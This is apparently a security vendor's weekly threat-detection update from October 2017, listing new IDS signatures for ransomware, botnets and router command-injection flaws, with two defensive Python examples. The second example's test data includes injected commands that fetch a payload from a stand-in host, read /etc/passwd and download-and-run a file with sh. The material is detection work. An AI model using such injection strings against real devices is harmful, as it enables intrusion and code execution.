Threat Intelligence and Cyber Threat Management (CTM) Protection Update for the 4th week of October 2017

New Detection Technique - Netgear DGN Remote Command Execution

A remote command execution vulnerability exists in the Netgear N150 Wireless Modem Router DGN series because the "TimeToLive" parameter is not properly validated before it is used. A specially crafted request can give a remote attacker command execution on the device.

We've added IDS signatures and the following correlation rule to detect this activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Netgear DGN Remote Command Execution

New Detection Technique - BadRabbit

BadRabbit is a new ransomware family currently being distributed as a fake Adobe Flash update. To spread in a worm-like fashion, much as WannaCry and NotPetya did, it uses Mimikatz to harvest credentials, the EternalRomance SMB exploit, and a list of common passwords.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Ransomware infection, BadRabbit

We also added IDS signatures and updated correlation rules to better detect the following ransomware families:

  • System Compromise, Ransomware infection, Cerber
  • System Compromise, Ransomware infection, Locky

New Detection Technique - IoT_Reaper

IoT_Reaper is a new and rapidly expanding botnet. Although it borrows some code from the infamous Mirai botnet, it differs in key ways: rather than brute-forcing weak Telnet passwords, IoT_Reaper spreads only by exploiting known vulnerabilities in IoT devices.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, IoT Reaper

New Detection Technique - BackSwing

BackSwing is a malicious JavaScript-based profiling framework. Attackers use it to fingerprint the systems of visitors to compromised sites and deliver the version of their malware suited to each target.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, BackSwing

New Detection Techniques

We've added the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Trojan infection, CryptoService Coin Stealer
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Possible D-Link 850L Password Extract Attempt
  • System Compromise, Trojan infection, Qtloader
  • System Compromise, Trojan infection, Dragonfly Backdoor.Goodor Go Implant

Updated Detection Technique - Malware SSL Certificates

We've added new IDS signatures covering the list of SSL certificates that abuse.ch has identified as associated with malware or botnet activity. The updated correlation rules use this information to detect command and control (C&C) communications of several malware families, including:

  • System Compromise, C&C Communication, Known malicious SSL certificate
  • System Compromise, C&C Communication, Panda Banker SSL activity
  • System Compromise, C&C Communication, TrickBot SSL activity
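As an added example, which is not part of this update or of abuse.ch's own tooling, the following Python shows how a certificate fingerprint feed is matched against TLS telemetry. It parses an abuse.ch SSL Blacklist (SSLBL) style CSV, normalizes the SHA1 fingerprints (the feed uses bare hex, Suricata's EVE JSON tls events use colon-separated hex), and flags every tls event whose leaf certificate is listed. The CSV rows, fingerprints, EVE events and IP addresses are all constructed for this example.

```python
import json
import re

# Constructed sample in the SSLBL CSV layout: Listingdate,SHA1,Listingreason.
# The fingerprints are made up for this example, not real listed certificates.
SSLBL_CSV = """\
# Listingdate,SHA1,Listingreason
2017-10-24 09:12:33,6a4d1e9f4b3a7c0d2e8f9a1b3c5d7e9f0a1b2c3d,TrickBot C&C
2017-10-25 11:02:05,0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c,Panda Banker C&C
"""

# Constructed Suricata EVE JSON events. The "fingerprint" field of a tls event
# carries the leaf certificate's SHA1 as colon-separated hex. One line is
# deliberately malformed and one is a non-tls event, to show both are skipped.
EVE_LINES = [
    '{"timestamp":"2017-10-25T14:03:11.000000+0000","event_type":"tls","src_ip":"10.0.0.12","dest_ip":"203.0.113.45","dest_port":443,"tls":{"subject":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd","issuer":"C=AU, ST=Some-State, O=Internet Widgits Pty Ltd","fingerprint":"6a:4d:1e:9f:4b:3a:7c:0d:2e:8f:9a:1b:3c:5d:7e:9f:0a:1b:2c:3d","version":"TLS 1.2"}}',
    '{"timestamp":"2017-10-25T14:03:12.000000+0000","event_type":"tls","src_ip":"10.0.0.12","dest_ip":"93.184.216.34","dest_port":443,"tls":{"subject":"CN=www.example.org","issuer":"CN=Example Issuing CA","fingerprint":"1f:2e:3d:4c:5b:6a:79:88:97:a6:b5:c4:d3:e2:f1:00:11:22:33:44","version":"TLS 1.2"}}',
    '{"timestamp":"2017-10-25T14:03:13.000000+0000","event_type":"http","src_ip":"10.0.0.12","dest_ip":"93.184.216.34","dest_port":80,"http":{"hostname":"www.example.org","url":"/"}}',
    'this line is not JSON and must not break the scan',
]

SHA1_HEX_RE = re.compile(r"^[0-9a-f]{40}$")


def normalize_sha1(value):
    """Lower-case a SHA1 fingerprint and strip colons; None if it is not 40 hex digits."""
    fp = value.strip().lower().replace(":", "")
    return fp if SHA1_HEX_RE.match(fp) else None


def load_sslbl(csv_text):
    """Parse SSLBL-style CSV into {sha1: listing_reason}, skipping comments and bad rows."""
    blocklist = {}
    for line in csv_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(",", 2)  # reason may itself contain commas
        if len(parts) != 3:
            continue
        fp = normalize_sha1(parts[1])
        if fp:
            blocklist[fp] = parts[2]
    return blocklist


def match_eve_tls(eve_lines, blocklist):
    """Return (timestamp, src_ip, dest_ip, reason) for each tls event with a listed certificate."""
    hits = []
    for raw in eve_lines:
        try:
            event = json.loads(raw)
        except ValueError:
            continue  # malformed line: skip rather than abort the whole scan
        if event.get("event_type") != "tls":
            continue
        fp = normalize_sha1(event.get("tls", {}).get("fingerprint", ""))
        if fp and fp in blocklist:
            hits.append((event["timestamp"], event["src_ip"], event["dest_ip"], blocklist[fp]))
    return hits


if __name__ == "__main__":
    for ts, src, dst, reason in match_eve_tls(EVE_LINES, load_sslbl(SSLBL_CSV)):
        print(f"{ts} {src} -> {dst}: known malicious SSL certificate ({reason})")
```

Normalizing both sides to bare lower-case hex is the whole trick: a feed entry and a sensor event that describe the same certificate only compare equal once the colons and letter case are removed.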

Updated Detection Technique - OSX/Proton

OSX/Proton, the newest variant of the Proton macOS backdoor family, has most recently been distributed embedded in a trojanized copy of the popular video transcoder HandBrake. Once executed, it displays a fake authentication dialog to obtain the user's credentials and elevate its privileges. Proton is currently being sold on the dark web for 40 BTC.

We've added IDS signatures and updated the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, OSX/Proton

Updated Detection Technique - Avtech

Multiple vulnerabilities have been found in Avtech's video surveillance products. Because the products appear to share a common codebase and lack basic security mitigations, the vulnerabilities work across numerous devices in the Avtech range. They are being exploited in the wild by the ARM Linux malware ELF_IMEIJ.A, which abuses a command injection vulnerability in the CloudSetup.cgi script to trigger the download of its payload.

We've added IDS signatures and updated the following correlation rule to detect this activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Avtech - Authenticated command injection vulnerability

Updated Detection Technique - NETGEAR ReadyNAS Surveillance Command Injection Attempt

An unauthenticated command injection vulnerability exists in NETGEAR ReadyNAS Surveillance because the "uploaddir" parameter is not sanitized before it is used in a system command. A specially crafted request gives a remote attacker code execution on the device.

We've added IDS signatures and the following correlation rule to detect this activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, NETGEAR ReadyNAS Surveillance Command Injection Attempt
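The three command injection entries above (the Netgear DGN "TimeToLive" parameter, the Avtech CloudSetup.cgi script and the ReadyNAS Surveillance "uploaddir" parameter) are detected the same way: look at the value an attacker controls and check whether it carries shell metacharacters. As an added example, not code from this update or from any of the vendors, the following Python runs that check over constructed HTTP requests. The parameter and script names come from the entries above; the URL paths, the other parameter names and the request contents are placeholders invented for the example, and the IPs are documentation addresses.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Shell metacharacters that terminate the intended argument or substitute a
# command. Any watched value containing one is treated as an injection attempt.
INJECTION_RE = re.compile(r"[;|`&\n]|\$\(")

# Parameters named in the advisories summarized above, inspected on any path.
WATCHED_PARAMS = {"TimeToLive", "uploaddir"}   # Netgear DGN, ReadyNAS Surveillance
# Scripts on which every parameter is inspected (the advisory text names the
# script but not the parameter).
WATCHED_SCRIPTS = {"CloudSetup.cgi"}            # Avtech

# Constructed requests: (src_ip, method, request_target, body). Paths are
# placeholders, not the devices' real endpoints.
SAMPLE_REQUESTS = [
    # Benign: a plain directory path in uploaddir
    ("10.0.0.5", "GET", "/cgi-bin/upgrade.cgi?cmd=writeuploaddir&uploaddir=%2Fmedia%2Fusb", ""),
    # Attack: "';" closes the quoted argument, then wget fetches a payload
    ("198.51.100.23", "GET", "/cgi-bin/upgrade.cgi?cmd=writeuploaddir&uploaddir=%27%3Bwget%20http%3A%2F%2F198.51.100.7%2Fbot%3B%27", ""),
    # Attack, double-encoded to slip past a signature that decodes only once:
    # %253B -> %3B -> ';'
    ("198.51.100.23", "POST", "/ping.cgi", "IPAddr=192.0.2.1&TimeToLive=64%253Bcat%2520%252Fetc%252Fpasswd"),
    # Attack against CloudSetup.cgi (parameter name "file" is a placeholder)
    ("198.51.100.77", "GET", "/cgi-bin/CloudSetup.cgi?file=wget%20-O%20%2Ftmp%2Fimeij%20http%3A%2F%2F198.51.100.7%2Fx%3Bsh%20%2Ftmp%2Fimeij", ""),
    # Benign: a pipe in a parameter nobody passes to a shell
    ("10.0.0.9", "GET", "/search.cgi?q=a%7Cb", ""),
]


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded metacharacters are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(method, target, body=""):
    """Return (script, param, decoded_value) for each watched value that carries shell syntax."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    pairs = parse_qsl(parts.query, keep_blank_values=True)  # decodes once
    if method.upper() == "POST" and body:
        pairs += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, raw_value in pairs:
        if name not in WATCHED_PARAMS and script not in WATCHED_SCRIPTS:
            continue
        value = decode_fully(raw_value)
        if INJECTION_RE.search(value):
            findings.append((script, name, value))
    return findings


def scan(records):
    """Run inspect_request over (src_ip, method, target, body) records; return alerts."""
    alerts = []
    for src_ip, method, target, body in records:
        for script, param, value in inspect_request(method, target, body):
            alerts.append((src_ip, script, param, value))
    return alerts


if __name__ == "__main__":
    for src_ip, script, param, value in scan(SAMPLE_REQUESTS):
        print(f"{src_ip} -> {script} {param}={value!r}: possible command injection")
```

Restricting the check to the parameters and scripts that actually reach a shell is what keeps the false-positive rate down: the pipe in the last request is harmless, and a signature that fired on every metacharacter in every query string would be unusable. The bounded repeated decoding is there for evasion attempts, not because every target decodes twice.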

Updated Detection Technique - Remote Access Tools

The typical attack pattern is an initial exploit of a vulnerability followed by the installation of malware. That second step often includes a Remote Administration Tool (RAT) used to gain control of the compromised machine.

We added IDS signatures and correlation rules to detect the following RAT activity:

  • System Compromise, Malware RAT, NanoCore

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Malicious Document
  • System Compromise, Malware infection, CoinMiner
  • System Compromise, Trojan infection, Chthonic
  • System Compromise, Trojan infection, Formbook
  • System Compromise, Trojan infection, Kryptik
  • System Compromise, Trojan infection, Panda Banker
  • System Compromise, Trojan infection, Qtloader
  • System Compromise, Trojan infection, Sality
  • System Compromise, Trojan infection, Trickbot
  • System Compromise, Trojan infection, Unknown trojan
  • System Compromise, Worm infection, Kraken